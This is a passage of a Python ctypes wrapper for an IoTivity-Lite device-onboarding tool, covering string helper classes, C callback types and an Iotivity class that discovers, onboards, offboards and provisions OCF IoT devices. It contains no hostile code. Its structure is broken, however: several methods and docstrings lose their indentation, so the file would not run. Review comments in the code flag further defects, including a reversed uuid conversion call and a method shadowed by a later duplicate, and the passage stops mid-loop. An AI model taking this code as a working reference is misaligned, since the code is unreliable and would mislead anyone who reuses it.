        return self.__class__(self.data.replace(old, new, maxsplit))

    def rfind(self, sub, start=0, end=sys.maxsize):
        return self.data.rfind(sub, start, end)

    def rindex(self, sub, start=0, end=sys.maxsize):
        return self.data.rindex(sub, start, end)

    def rjust(self, width, *args):
        return self.__class__(self.data.rjust(width, *args))

    def rpartition(self, sep):
        return self.data.rpartition(sep)

    def rstrip(self, chars=None):
        return self.__class__(self.data.rstrip(chars))

    def split(self, sep=None, maxsplit=-1):
        return self.data.split(sep, maxsplit)

    def rsplit(self, sep=None, maxsplit=-1):
        return self.data.rsplit(sep, maxsplit)

    def splitlines(self, keepends=0):
        return self.data.splitlines(keepends)

    def startswith(self, prefix, start=0, end=sys.maxsize):
        return self.data.startswith(prefix, start, end)

    def strip(self, chars=None):
        return self.__class__(self.data.strip(chars))

    def swapcase(self):
        return self.__class__(self.data.swapcase())

    def title(self):
        return self.__class__(self.data.title())

    def translate(self, *args):
        return self.__class__(self.data.translate(*args))

    def upper(self):
        return self.__class__(self.data.upper())

    def zfill(self, width):
        return self.__class__(self.data.zfill(width))
class MutableString(UserString):
    """mutable string objects

    Python strings are immutable objects. This has the advantage, that
    strings may be used as dictionary keys. If this property isn't needed
    and you insist on changing string values in place instead, you may cheat
    and use MutableString.

    But the purpose of this class is an educational one: to prevent
    people from inventing their own mutable string class derived
    from UserString and than forget thereby to remove (override) the
    __hash__ method inherited from UserString. This would lead to
    errors that would be very hard to track down.

    A faster and better solution is to rewrite your program using lists."""

    def __init__(self, string=""):
        # Unlike UserString.__init__, stores the value as-is (no bytes coercion).
        self.data = string

    def __hash__(self):
        raise TypeError("unhashable type (it is mutable)")

    def __setitem__(self, index, sub):
        # Negative indices wrap like built-in sequences.
        if index < 0:
            index += len(self.data)
        if index < 0 or index >= len(self.data):
            raise IndexError
        self.data = self.data[:index] + sub + self.data[index + 1 :]

    def __delitem__(self, index):
        if index < 0:
            index += len(self.data)
        if index < 0 or index >= len(self.data):
            raise IndexError
        self.data = self.data[:index] + self.data[index + 1 :]

    def __setslice__(self, start, end, sub):
        # Python 2 relic; Python 3 routes slice assignment through __setitem__.
        start = max(start, 0)
        end = max(end, 0)
        if isinstance(sub, UserString):
            self.data = self.data[:start] + sub.data + self.data[end:]
        elif isinstance(sub, bytes):
            self.data = self.data[:start] + sub + self.data[end:]
        else:
            self.data = self.data[:start] + str(sub).encode() + self.data[end:]

    def __delslice__(self, start, end):
        # Python 2 relic, see __setslice__.
        start = max(start, 0)
        end = max(end, 0)
        self.data = self.data[:start] + self.data[end:]

    def immutable(self):
        # Snapshot as an immutable UserString.
        return UserString(self.data)

    def __iadd__(self, other):
        if isinstance(other, UserString):
            self.data += other.data
        elif isinstance(other, bytes):
            self.data += other
        else:
            self.data += str(other).encode()
        return self

    def __imul__(self, n):
        self.data *= n
        return self
class String(MutableString, Union):
    """ctypes-compatible string: a Union viewing the same storage either as a
    raw ``char*`` ("raw") or as a NUL-terminated ``c_char_p`` ("data")."""

    _fields_ = [("raw", POINTER(c_char)), ("data", c_char_p)]

    def __init__(self, obj=""):
        # bytes-like values go through the c_char_p view; anything else is
        # assumed to already be a pointer and goes through the raw view.
        if isinstance(obj, (bytes, UserString)):
            self.data = bytes(obj)
        else:
            self.raw = obj

    def __len__(self):
        # data is None for a NULL pointer, hence the and/or guard.
        return self.data and len(self.data) or 0

    def from_param(cls, obj):
        # Accept the many shapes callers may pass for a char* argument.
        # Convert None or 0
        if obj is None or obj == 0:
            return cls(POINTER(c_char)())
        # Convert from String
        elif isinstance(obj, String):
            return obj
        # Convert from bytes
        elif isinstance(obj, bytes):
            return cls(obj)
        # Convert from str
        elif isinstance(obj, str):
            return cls(obj.encode())
        # Convert from c_char_p
        elif isinstance(obj, c_char_p):
            return obj
        # Convert from POINTER(c_char)
        elif isinstance(obj, POINTER(c_char)):
            return obj
        # Convert from raw pointer
        elif isinstance(obj, int):
            return cls(cast(obj, POINTER(c_char)))
        # Convert from c_char array
        elif isinstance(obj, c_char * len(obj)):
            return obj
        # Convert from object
        else:
            return String.from_param(obj._as_parameter_)

    from_param = classmethod(from_param)
def ReturnString(obj, func=None, arguments=None):
    """ctypes ``errcheck``-style hook: coerce a returned value into a String.

    func/arguments are accepted (and ignored) to match the errcheck signature.
    """
    return String.from_param(obj)
# C-callable no-argument init hook (int return) for the handler table.
@CFUNCTYPE(c_int)
def init_callback():
    print("init_callback")
    # NOTE(review): ctypes callbacks normally return a plain Python int;
    # confirm c_int(0) is accepted by the installed ctypes version.
    return c_int(0)
# C-callable void hook used to wake the C event loop.
@CFUNCTYPE(None)
def signal_event_loop():
    print("signal_event_loop")

# Convenience alias: an int-returning, no-argument C callback type.
cb_type = CFUNCTYPE(c_int)
class HANDLER(Structure):
    # Mirrors a C handler function-pointer table.
    # NOTE(review): field names starting with "." and the "_defaults_"
    # attribute are not standard ctypes conventions — confirm how the
    # consuming C code actually uses this structure.
    _fields_ = [(".init", CFUNCTYPE(c_int)),
                (".signal_event_loop", CFUNCTYPE(c_int)),
                (".requests_entry", CFUNCTYPE(None))]
    _defaults_ = { ".init" : init_callback,
                   ".signal_event_loop": signal_event_loop,
                   ".requests_entry": None
                 }
def wrap_function(lib, funcname, restype, argtypes):
    """Look up *funcname* on *lib* and attach its ctypes call signature.

    Returns the configured function object.
    """
    fn = getattr(lib, funcname)
    fn.restype = restype
    fn.argtypes = argtypes
    return fn
class OC_UUID(Structure):
    """ctypes mirror of the C uuid struct: 16 raw bytes."""
    _fields_ = [("id", c_uint8 * 16)]
class OC_DEVICE_HANDLE(Structure):
    """ctypes mirror of the C device-handle linked-list node."""
    pass

# Fields are assigned after the class statement because the structure is
# self-referential ("next" points to another OC_DEVICE_HANDLE).
OC_DEVICE_HANDLE._fields_ = (
    ('uuid', OC_UUID),
    ('device_name', c_char * 64),
    ('next', POINTER(OC_DEVICE_HANDLE)),
)
# python list of copied unowned/owned devices on the local network
#my_unowned_devices = []
#my_owned_devices = []
# python callback of a discovery call
#@CFUNCTYPE(None, POINTER(OC_UUID), c_void_p, c_void_p )
#def unowned_device_cb(uuid, eps, data):
# print("\nDiscovered unowned device:")
# my_uuid = my_iotivity.uuid2str(uuid)
# print (" uuid:",my_uuid)
# if my_uuid not in myunowned_devices:
# my_unowned_devices.append(my_uuid)
# python callback of a discovery call
#@CFUNCTYPE(None, POINTER(OC_UUID), c_void_p, c_void_p )
#def owned_device_cb(uuid, eps, data):
# print("\nDiscovered owned device: ")
# my_uuid = my_iotivity.uuid2str(uuid)
# print (" uuid:",my_uuid)
# if my_uuid not in my_owned_devices:
# my_owned_devices.append(my_uuid)
# ctypes prototypes for the Python callbacks the C layer invokes; every
# parameter arrives as a C string (bytes) and may be NULL/None.
CHANGED_CALLBACK = CFUNCTYPE(None, c_char_p, c_char_p, c_char_p)
DIPLOMAT_CALLBACK = CFUNCTYPE(None, c_char_p, c_char_p, c_char_p,c_char_p,c_char_p,c_char_p)
RESOURCE_CALLBACK = CFUNCTYPE(None, c_char_p, c_char_p, c_char_p, c_char_p)
CLIENT_CALLBACK = CFUNCTYPE(None, c_char_p, c_char_p,c_char_p)
class Device():
    """Plain record describing a discovered OCF device.

    uuid: device uuid string; owned_state: True/False/None; name: friendly name;
    resources/resource_array: optional resource data; credentials/last_event:
    opaque values stored as given.
    """
    def __init__(self, uuid, owned_state=None, name="", resources=None,
                 resource_array=None, credentials=None, last_event=None):
        self.uuid = uuid
        self.owned_state = owned_state
        self.name = name
        self.credentials = credentials
        self.resources = resources
        # BUG FIX: resources/resource_array were accepted but silently ignored
        # (resource_array was always reset to []). Honour caller-supplied values;
        # default stays a fresh empty list, so existing callers are unaffected.
        self.resource_array = [] if resource_array is None else resource_array
        self.last_event = last_event
class Diplomat():
    """Plain record describing the streamlined-onboarding diplomat.

    target_dict seeds the target-credential mapping; other arguments are
    stored as given.
    """
    def __init__(self, uuid=None, owned_state=None, name="", observe_state=None,
                 target_dict=None, last_event=None):
        self.uuid = uuid
        self.owned_state = owned_state
        self.name = name
        self.observe_state = observe_state
        # BUG FIX: target_dict was accepted but silently ignored (target_cred
        # was always {}). Honour it; default stays a fresh empty dict.
        self.target_cred = {} if target_dict is None else target_dict
        self.last_event = last_event

# Module-level singleton updated in place by the diplomat callback.
diplomat = Diplomat()
class Iotivity():
""" ********************************
Call back handles general task like device
discovery.
needs to be before _init_
**********************************"""
    def changedCB(self,uuid,cb_state,cb_event):
        """CHANGED_CALLBACK target invoked from the C layer on device
        discovery / ownership-state changes.

        All three arguments arrive as C byte strings (or None) and are decoded
        in place. Updates self.device_array and signals the module-level
        events so blocking API calls can proceed.
        """
        print("Changed event: Device: {}, State:{} Event:{}".format(uuid, cb_state,cb_event))
        name = ""
        if uuid != None:
            uuid = uuid.decode("utf-8")
            name = self.get_device_name(uuid)
        if cb_state != None:
            cb_state = cb_state.decode("utf-8")
        if cb_event != None:
            cb_event = cb_event.decode("utf-8")
        if(cb_state=="unowned"):
            print("Unowned Discovery Event:{}".format(uuid))
            dev = Device(uuid,owned_state=False,name=name,last_event=cb_event)
            if not self.device_array_contains(uuid):
                self.device_array.append(dev)
            if cb_event is not None: #update array entry
                for index, device in enumerate(self.device_array):
                    if device.uuid==uuid:
                        self.device_array[index] = dev
            device_event.set()
            unowned_event.set()
        if(cb_state=="owned"):
            print("Owned Discovery Event:{}".format(uuid))
            # NOTE(review): unlike the unowned branch there is no duplicate
            # check here, so repeated discoveries append duplicate entries —
            # confirm whether that is intended.
            dev = Device(uuid,owned_state=True,name=name)
            self.device_array.append(dev)
            owned_event.set()
""" ********************************
Call back handles streamlined onboarding tasks.
Diplomat discovery/state
Observes from diplomat
**********************************"""
    def diplomatCB(self,anchor,uri,state,cb_event,target,target_cred):
        """DIPLOMAT_CALLBACK target: updates the module-level ``diplomat``
        record from the C layer.

        anchor arrives as b'ocf://<uuid>'; the slice below strips the
        "b'ocf://" prefix and trailing quote of its repr. Sets so_event on a
        streamlined-onboarding ("so_otm") event and always sets diplomat_event.
        """
        uuid = str(anchor)[8:-1]
        if len(uuid):
            diplomat.uuid = uuid
        if len(state):
            diplomat.owned_state = state
        if cb_event is not None:
            # events look like "<kind>:<payload>"; keep both pieces
            last_event = diplomat.last_event=cb_event.decode('utf-8').split(":",1)
            if last_event[0] == "so_otm":
                so_event.set()
        diplomat_event.set()
        print("Diplomat CB: UUID: {}, Uri:{} State:{} Event:{} Target:{} Target Cred:{}".format(uuid,uri,state,cb_event,target,target_cred))
""" ********************************
Call back handles client command callbacks.
Client discovery/state
**********************************"""
def clientCB(self,cb_uuid,cb_state,cb_event):
uuid=""
state=""
event=""
if len(cb_uuid):
uuid = cb_uuid.decode("utf-8")
if len(cb_state):
state = cb_state.decode("utf-8")
if cb_event is not None:
event = cb_event.decode("utf-8")
print("Command CB: UUID: {}, State:{}, Event:{}".format(uuid,state,event))
""" ********************************
Call back handles resource call backs tasks.
Resources is an dictionary with uuid of device
**********************************"""
    def resourceCB(self, anchor, uri, rtypes, myjson):
        """RESOURCE_CALLBACK target: accumulates discovered resources per
        device uuid into self.resourcelist.

        anchor/uri/myjson arrive as C byte strings; the [8:-1]/[2:-1] slices
        strip the b'...' repr decoration (and the "ocf://" prefix for anchor).
        An empty uri marks the end of discovery and sets resource_event.
        """
        uuid = str(anchor)[8:-1]
        uuid_new = copy.deepcopy(uuid)
        my_uri = str(uri)[2:-1]
        if 'resources' in self.debug:
            print(colored(" Resource Event \n",'green',attrs=['underline']))
            print(colored("UUID:{}, \nURI:{}",'green').format(uuid_new,my_uri))
        my_str = str(myjson)[2:-1]
        my_str = json.loads(my_str)
        duplicate_uri = False
        if self.resourcelist.get(uuid_new) is None:
            mylist = [ my_str ]
            # don't add duplicate resource lists
            if uuid_new not in self.resourcelist:
                self.resourcelist[uuid_new] = mylist
        else:
            mylist = self.resourcelist[uuid_new]
            # Make sure to not add duplicate resources if second discovery
            for resource in mylist:
                if my_uri == resource['uri']:
                    duplicate_uri=True
            if not duplicate_uri:
                mylist.append(my_str)
            # don't add duplicate resource lists
            if uuid_new not in self.resourcelist:
                self.resourcelist[uuid_new] = mylist
            if 'resources' in self.debug:
                print(colored(" -----resourcelist {}",'cyan').format(mylist))
        # Look for zero length uri...this means discovery is complete
        if len(my_uri) <=0:
            resource_event.set()
            print("ALL resources gathered");
            if 'resources' in self.debug:
                print(colored("Resources {}",'yellow').format(self.resourcelist))
def __init__(self,debug=None):
print ("loading ...")
resource_mutex.acquire()
libname = 'libiotivity-lite-client-python.so'
libdir = os.path.dirname(__file__)
self.lib=ctl.load_library(libname, libdir)
# python list of copied unowned devices on the local network
# will be updated from the C layer automatically by the CHANGED_CALLBACK
self.unowned_devices = []
# python list of copied owned devices on the local network
# will be updated from the C layer automatically by the CHANGED_CALLBACK
self.owned_devices = []
# resource list
self.resourcelist = {}
self.device_array = []
print (self.lib)
print ("...")
self.debug=debug
self.lib.oc_set_con_res_announced(c_bool(False));
print("oc_set_con_res_announced - done")
self.lib.oc_set_max_app_data_size(c_size_t(16384));
print("oc_set_max_app_data_size- done")
value = self.lib.oc_get_max_app_data_size()
print("oc_get_max_app_data_size :", value)
self.changedCB = CHANGED_CALLBACK(self.changedCB)
self.lib.install_changedCB(self.changedCB)
ret = self.lib.oc_storage_config("./onboarding_tool_creds");
print("oc_storage_config : {}".format(ret))
self.resourceCB = RESOURCE_CALLBACK(self.resourceCB)
self.lib.install_resourceCB(self.resourceCB)
self.diplomatCB = DIPLOMAT_CALLBACK(self.diplomatCB)
self.lib.install_diplomatCB(self.diplomatCB)
self.clientCB = CLIENT_CALLBACK(self.clientCB)
self.lib.install_diplomatCB(self.clientCB)
print ("...")
self.threadid = threading.Thread(target=self.thread_function, args=())
self.threadid.start()
print ("...")
def thread_function(self):
""" starts the main function in C.
this function is threaded in python.
"""
print ("thread started")
init = self.lib.python_main()
def init_platform(self):
# not used
ret = self.lib.oc_storage_config("./onboarding_tool_creds");
print ("oc_storage_config-done", ret)
ret = self.lib.oc_init_platform("OCF", None, None)
print ("oc_init_platform-done", ret)
ret = self.lib.oc_add_device("/oic/d", "oic.d.dots", "OBT", "ocf.2.2.2", "ocf.res.1.0.0,ocf.sh.1.0.0", None, None)
print ("oc_init_platform-done", ret)
ret = self.lib.oc_device_bind_resource_type(0, "oic.d.ams")
print ("oc_device_bind_resource_type-ams-done", ret)
ret = self.lib.oc_device_bind_resource_type(0, "oic.d.cms")
print ("oc_device_bind_resource_type-cms-done", ret)
print("oc_init_platform-done",ret)
#self.lib.display_device_uuid();
def get_result(self):
self.lib.get_cb_result.restype = bool
return self.lib.get_cb_result()
def purge_device_array(self,uuid):
for index, device in enumerate(self.device_array):
if device.uuid==uuid:
print("Remove: {}".format(device.uuid))
self.device_array.pop(index)
    def discover_unowned(self):
        """Trigger unowned-device multicast discovery and return the device cache.

        Blocks ~3s for C-side responses plus up to 5s on unowned_event, which
        changedCB sets when an unowned device is reported.
        """
        print(colored(20*" "+"Discover Unowned Devices"+20*" ",'yellow',attrs=['underline']))
        # OBT application
        ret = self.lib.discover_unowned_devices(c_int(0x05))
        time.sleep(3)
        # python callback application
        print("discover_unowned- done")
        nr_unowned = self.get_nr_unowned_devices()
        owned_state=False
        #self.purge_device_array(owned_state)
        unowned_event.wait(5)
        print("UNOWNED DEVICE ARRAY {}".format(self.device_array))
        return self.device_array
def device_array_contains(self,uuid):
contains = False
for index, device in enumerate(self.device_array):
if device.uuid == uuid:
contains = True
return contains
def get_device(self,uuid):
ret = None
for index, device in enumerate(self.device_array):
if device.uuid == uuid:
ret = device
return ret
    def return_devices_array(self):
        """Accessor: the live (not copied) cached device list."""
        return self.device_array
    def discover_all(self):
        """Run unowned and owned discovery, wait for slow devices, then print
        both cached uuid lists (blocks ~20s plus discovery time)."""
        self.discover_unowned()
        self.discover_owned()
        time.sleep(20)
        self.list_owned_devices()
        self.list_unowned_devices()
def return_unowned_devices(self):
print("Called return list Thread:{}".format(threading.get_ident()))
unowned_return_list={}
nr_unowned = self.get_nr_unowned_devices()
for i in range(nr_unowned):
uuid = self.get_unowned_uuid(i)+""
unowned_return_list[i] = uuid
return unowned_return_list
def list_unowned_devices(self):
nr_unowned = self.get_nr_unowned_devices()
print ("list_unowned_devices: unowned:",nr_unowned )
for i in range(nr_unowned):
uuid = self.get_unowned_uuid(i)
print (" unowned index {} uuid {}".format(i, uuid))
if uuid not in self.unowned_devices:
self.unowned_devices.append(uuid)
def list_owned_devices(self):
nr_owned = self.get_nr_owned_devices()
print ("list_owned_devices: owned:",nr_owned )
for i in range(nr_owned):
uuid = self.get_owned_uuid(i)
print (" owned index {} uuid {}".format(i, uuid))
if uuid not in self.owned_devices:
self.owned_devices.append(uuid)
    def discover_owned(self):
        """Trigger owned-device multicast discovery and return the device cache.

        Blocks ~3s for C-side responses plus up to 5s on owned_event, which
        changedCB sets when an owned device is reported.
        """
        print(colored(20*" "+"Discover Owned Devices"+20*" ",'yellow',attrs=['underline']))
        #ret = self.lib.discover_owned_devices(c_int(0x02))
        #ret = self.lib.discover_owned_devices(c_int(0x03))
        ret = self.lib.discover_owned_devices(c_int(0x05))
        time.sleep(3)
        # call with call back in python
        #ret = self.lib.oc_obt_discover_owned_devices(owned_device_cb, None)
        nr_owned = self.get_nr_owned_devices()
        owned_state=True
        owned_event.wait(5)
        print("OWNED DEVICE ARRAY {}",self.device_array)
        return self.device_array
def discover_diplomats(self):
    """Start diplomat discovery and wait up to 5s for the discovery callback."""
    print(colored(20*" "+"Discover Diplomats"+20*" ",'yellow',attrs=['underline']))
    ret = self.lib.py_discover_diplomat_for_observe();
    diplomat_event.wait(5)  # set by the python-side diplomat callback
    # NOTE(review): 'diplomat' is a module-level name presumably filled in by the
    # callback — confirm it is defined before this returns
    return diplomat
def diplomat_set_observe(self,state):
    """Push observe *state* to the diplomat, then block until streamlined OTM completes."""
    state = copy.deepcopy(state)  # avoid mutating the caller's object
    print(colored(20*" "+"Set Diplomats"+20*" ",'yellow',attrs=['underline']))
    print("Diplomat State: {}".format(state))
    self.lib.py_diplomat_set_observe.argtypes = [String]
    ret = self.lib.py_diplomat_set_observe(str(state))
    print("Waiting for Streamlined OTM ")
    so_event.wait()  # no timeout: blocks forever if the OTM event never fires
    return diplomat
def quit(self):
    """Ask the C layer to shut down its main loop."""
    self.lib.python_exit(c_int(0))
def sig_handler(self, signum, frame):
    """SIGINT handler: offboard all owned devices, shut the C layer down, then exit."""
    print ("sig_handler..")
    self.offboard_all_owned()
    time.sleep(10)  # give the reset requests time to reach the devices
    self.quit()
    sys.exit()
def uuid2str(self, oc_uuid):
    """Convert an OC_UUID struct to its string form via the C helper oc_uuid_to_str."""
    print (" uuid in:", oc_uuid)
    my_uuid = create_string_buffer(50)  # 50 bytes is ample for a 36-char uuid + NUL
    # fix: the original assigned to 'argstype' (typo), so the argument types
    # were never actually registered with ctypes
    self.lib.oc_uuid_to_str.argtypes = [POINTER(OC_UUID), c_char_p, c_int]
    self.lib.oc_uuid_to_str(oc_uuid, my_uuid, 50)
    return str(my_uuid.value)
def str2uuid(self, my_uuid):
    """Convert a uuid string into an OC_UUID struct.

    NOTE(review): this calls oc_uuid_to_str with reversed argument types; a
    str->uuid conversion would normally use oc_str_to_uuid — confirm against the
    IoTivity C API. It also overwrites the argtypes that uuid2str() configures on
    the same symbol, so interleaved calls may misbehave.
    """
    self.lib.oc_uuid_to_str.argtypes = [c_char_p, POINTER(OC_UUID)]
    my_uuid_s = OC_UUID()
    my_uuid_bytes = str(my_uuid).encode('utf-8')
    self.lib.oc_uuid_to_str(my_uuid_bytes, my_uuid_s)
    print (" type: ", my_uuid_s)
    return my_uuid_s
def test_uuid(self):
    """Smoke test: round-trip a random uuid through str2uuid and uuid2str."""
    my_uuid = str(uuid.uuid4())
    print ("uuid in :", my_uuid)
    my_s = self.str2uuid(my_uuid)
    r_uuid = self.uuid2str(my_s)
    print (" returned:", r_uuid)
def get_nr_owned_devices(self):
    """Return the number of owned devices cached in the IoTivity C layer.

    A discovery request must have been executed before this call.
    """
    self.lib.py_get_nr_owned_devices.argtypes = []
    self.lib.py_get_nr_owned_devices.restype = c_int
    return self.lib.py_get_nr_owned_devices()
def get_nr_unowned_devices(self):
    """Return the number of unowned devices cached in the IoTivity C layer.

    A discovery request must have been executed before this call.
    """
    self.lib.py_get_nr_unowned_devices.argtypes = []
    self.lib.py_get_nr_unowned_devices.restype = c_int
    return self.lib.py_get_nr_unowned_devices()
def get_owned_uuid(self, index):
    """Return the uuid of the owned device at *index* in the C layer's owned list."""
    self.lib.get_uuid.argtypes = [c_int, c_int]
    # pointer-width check decides how the returned char* is marshalled
    if sizeof(c_int) == sizeof(c_void_p):
        self.lib.get_uuid.restype = ReturnString
    else:
        self.lib.get_uuid.restype = String
    self.lib.get_uuid.errcheck = ReturnString
    uuid = self.lib.get_uuid(1,c_int(index))  # first arg 1 selects the OWNED list
    uuid_copy = '' + uuid  # force a plain-str copy, detached from the C buffer
    return uuid_copy
def get_unowned_uuid(self, index):
    """Return the uuid of the unowned device at *index* in the C layer's unowned list."""
    self.lib.get_uuid.argtypes = [c_int, c_int]
    if sizeof(c_int) == sizeof(c_void_p):
        self.lib.get_uuid.restype = ReturnString
    else:
        self.lib.get_uuid.restype = String
    self.lib.get_uuid.errcheck = ReturnString
    uuid = self.lib.get_uuid(0,c_int(index))  # first arg 0 selects the UNOWNED list
    uuid_copy = '' + uuid
    print ("get_unowned_uuid: uuid:", uuid)
    return uuid_copy
def get_owned_device_name(self, index):
    """Return the name of the owned device at *index* in the C layer's owned list."""
    self.lib.get_device_name.argtypes = [c_int, c_int]
    # pointer-width check decides how the returned char* is marshalled
    if sizeof(c_int) == sizeof(c_void_p):
        self.lib.get_device_name.restype = ReturnString
    else:
        # fix: the original referenced 'get_uget_device_nameuid' (typo), which
        # raises AttributeError on any platform where this branch runs
        self.lib.get_device_name.restype = String
    self.lib.get_device_name.errcheck = ReturnString
    return self.lib.get_device_name(1,c_int(index))  # 1 selects the OWNED list
def get_unowned_device_name(self, index):
    """Return the name of the unowned device at *index* in the C layer's unowned list."""
    self.lib.get_device_name.argtypes = [c_int, c_int]
    if sizeof(c_int) == sizeof(c_void_p):
        self.lib.get_device_name.restype = ReturnString
    else:
        self.lib.get_device_name.restype = String
    # fix: errcheck was set on get_uuid instead of get_device_name, so the
    # wrapper never applied to this call (cf. get_owned_device_name)
    self.lib.get_device_name.errcheck = ReturnString
    device_name = self.lib.get_device_name(0,c_int(index))  # 0 selects the UNOWNED list
    print("Device Name: {}, {}".format(device_name,index))
    return device_name
def get_device_name(self, device_uuid):
    """Return the device name for *device_uuid*, resolved by the C layer."""
    self.lib.get_device_name_from_uuid.argtypes = [String]
    device_name = ""
    # pointer-width check decides how the returned char* is marshalled
    if sizeof(c_int) == sizeof(c_void_p):
        self.lib.get_device_name_from_uuid.restype = ReturnString
    else:
        self.lib.get_device_name_from_uuid.restype = String
    self.lib.get_device_name_from_uuid.errcheck = ReturnString
    device_name = self.lib.get_device_name_from_uuid(device_uuid)
    print("Device Name: {}".format(device_name))
    return str(device_name)
def onboard_all_unowned(self):
    """Onboard every cached unowned device via just-works OTM.

    Each device gets up to 5 attempts; each attempt polls get_result()
    for up to 10 seconds.
    """
    print ("onboard_all_unowned: listing NOT onboarded devices in C:")
    self.list_unowned_devices()  # refreshes self.unowned_devices
    print ("onboarding...")
    self.lib.py_otm_just_works.argtypes = [String]
    self.lib.py_otm_just_works.restype = None
    for device in self.unowned_devices:
        device_name = self.get_device_name(device)
        print ("Onboarding device :", device, device_name)
        run_count = 0
        result = False
        while run_count < 5 and not result:  # up to 5 OTM attempts per device
            run_count += 1
            self.lib.py_otm_just_works(device)
            start_time = time.time()
            timeout = 10
            time.sleep(1)
            # poll until the C layer reports success or the attempt times out
            while True:
                result = self.get_result()
                end_time = time.time()
                if result or end_time > start_time + timeout:
                    time_taken = end_time - start_time
                    break
            if result:
                print (f"Onboarding succeeded for: {device} {device_name}")
                print (f"Time taken: {time_taken:.3} seconds")
            else:
                print (f"Onboarding failed for: {device} {device_name}")
        time.sleep(1)
    print ("...done.")
def onboard_cloud_proxy(self):
    """Onboard only devices whose name contains "proxy" via just-works OTM.

    Same retry scheme as onboard_all_unowned: up to 5 attempts per device,
    each polling get_result() for up to 10 seconds.
    """
    print ("onboard_cloud_proxy: listing NOT onboarded devices in C:")
    self.list_unowned_devices()  # refreshes self.unowned_devices
    # fix: declare the foreign-function signature before calling, consistent
    # with onboard_all_unowned / onboard_chili (the original relied on a
    # sibling method having configured it first)
    self.lib.py_otm_just_works.argtypes = [String]
    self.lib.py_otm_just_works.restype = None
    for device in self.unowned_devices:
        device_name = self.get_device_name(device)
        if "proxy" in str(device_name).lower():
            print ("Onboarding device :", device, device_name)
            run_count = 0
            result = False
            while run_count < 5 and not result:  # up to 5 OTM attempts
                run_count += 1
                self.lib.py_otm_just_works(device)
                start_time = time.time()
                timeout = 10
                time.sleep(1)
                # poll until the C layer reports success or the attempt times out
                while True:
                    result = self.get_result()
                    end_time = time.time()
                    if result or end_time > start_time + timeout:
                        time_taken = end_time - start_time
                        break
                if result:
                    print (f"Onboarding succeeded for: {device} {device_name}")
                    print (f"Time taken: {time_taken:.3} seconds")
                else:
                    print (f"Onboarding failed for: {device} {device_name}")
            time.sleep(1)
    print ("...done.")
def onboard_chili(self):
    """Onboard only Cascoda "chili" devices (name contains "cascoda") via just-works OTM.

    Same retry scheme as onboard_all_unowned: up to 5 attempts per device,
    each polling get_result() for up to 10 seconds.
    """
    print ("onboard_chili: listing NOT onboarded devices in C:")
    self.list_unowned_devices()  # refreshes self.unowned_devices
    print ("onboarding...")
    self.lib.py_otm_just_works.argtypes = [String]
    self.lib.py_otm_just_works.restype = None
    for device in self.unowned_devices:
        device_name = self.get_device_name(device)
        if "cascoda" in str(device_name).lower():
            print ("Onboarding device :", device, device_name)
            run_count = 0
            result = False
            while run_count < 5 and not result:  # up to 5 OTM attempts
                run_count += 1
                self.lib.py_otm_just_works(device)
                start_time = time.time()
                timeout = 10
                time.sleep(1)
                # poll until the C layer reports success or the attempt times out
                while True:
                    result = self.get_result()
                    end_time = time.time()
                    if result or end_time > start_time + timeout:
                        time_taken = end_time - start_time
                        break
                if result:
                    print (f"Onboarding succeeded for: {device} {device_name}")
                    print (f"Time taken: {time_taken:.3} seconds")
                else:
                    print (f"Onboarding failed for: {device} {device_name}")
            time.sleep(1)
    print ("...done.")
    # fix: removed a stray copy-paste loop that followed here and blindly
    # re-onboarded EVERY unowned device, defeating the "cascoda only" filter
def onboard_device(self,device):
    """Onboard a single device using its configured OTM ("justworks" or "randompin"),
    then drop its cached resources and purge it from the device array."""
    print("Onboarding device: {}".format(device))
    if device.otm == "justworks":
        self.lib.py_otm_just_works.argtypes = [String]
        self.lib.py_otm_just_works.restype = None
        self.lib.py_otm_just_works(device.uuid)
    if device.otm == "randompin":
        self.lib.py_otm_rdp.argtypes = [String, String]
        self.lib.py_otm_rdp.restype = None
        self.lib.py_otm_rdp(device.uuid,device.random_pin)
    # remove the now-owned uuid from the cached resource list
    # (idiomatic dict.pop replaces the original scan-keys-and-delete loop)
    self.resourcelist.pop(device.uuid, None)
    self.purge_device_array(device.uuid)
def request_random_pin(self,device):
    """Ask *device* to generate a random PIN for random-pin OTM.

    Waits up to 5s for the device callback, then returns the refreshed
    entry from self.device_array (or "" if it is no longer present).
    """
    device_event.clear()  # reset before triggering, so wait() sees the new event
    print("Request Random PIN: {}".format(device))
    self.lib.py_request_random_pin.argtypes = [String]
    self.lib.py_request_random_pin.restype = None
    self.lib.py_request_random_pin(device.uuid)
    device_event.wait(5)
    ret =""
    for index, device_a in enumerate(self.device_array):
        print("uuid:{}, last_event:{}".format(device_a.uuid,device_a.last_event))
        if device_a.uuid==device.uuid:
            ret = device_a
    return ret
def offboard_device(self,device):
    """Reset (offboard) a single owned device by uuid, then drop its cached
    resources and purge it from the device array."""
    print ("offboard device :", device)
    self.lib.py_reset_device.argtypes = [String]
    self.lib.py_reset_device.restype = None
    self.lib.py_reset_device(device)
    # remove the uuid from the cached resource list
    # (idiomatic dict.pop replaces the original scan-keys-and-delete loop)
    self.resourcelist.pop(device, None)
    self.purge_device_array(device)
def offboard_all_owned(self):
    """Reset (offboard) every cached owned device.

    Each device gets up to 5 reset attempts; each attempt polls get_result()
    for up to 10 seconds.
    """
    print ("listing onboarded devices:")
    self.list_owned_devices()  # refreshes self.owned_devices
    print ("offboarding...")
    self.lib.py_reset_device.argtypes = [String]
    self.lib.py_reset_device.restype = None
    for device in self.owned_devices:
        device_name = self.get_device_name(device)
        print ("Offboarding device :", device, device_name)
        run_count = 0
        result = False
        while run_count < 5 and not result:  # up to 5 reset attempts per device
            run_count += 1
            self.lib.py_reset_device(device)
            start_time = time.time()
            timeout = 10
            time.sleep(1)
            # poll until the C layer reports success or the attempt times out
            while True:
                result = self.get_result()
                end_time = time.time()
                if result or end_time > start_time + timeout:
                    time_taken = end_time - start_time
                    break
            if result:
                print (f"Offboarding succeeded for: {device} {device_name}")
                print (f"Time taken: {time_taken:.3} seconds")
            else:
                print (f"Offboarding failed for: {device} {device_name}")
        time.sleep(1)
    print ("...done.")
def provision_ace_cloud_access(self, device_uuid):
    """Provision an ACE granting *device_uuid* cloud access, with retries.

    NOTE(review): a second, simpler provision_ace_cloud_access defined later in
    this class shadows this retry-based version at runtime — confirm which one
    is intended and remove the other.
    """
    self.lib.py_provision_ace_cloud_access.argtypes = [String]
    self.lib.py_provision_ace_cloud_access.restype = None
    device_name = self.get_device_name(device_uuid)
    print( "provision_ace_cloud_access (ACL):",device_uuid)
    run_count = 0
    result = False
    while run_count < 5 and not result:  # up to 5 attempts
        run_count += 1
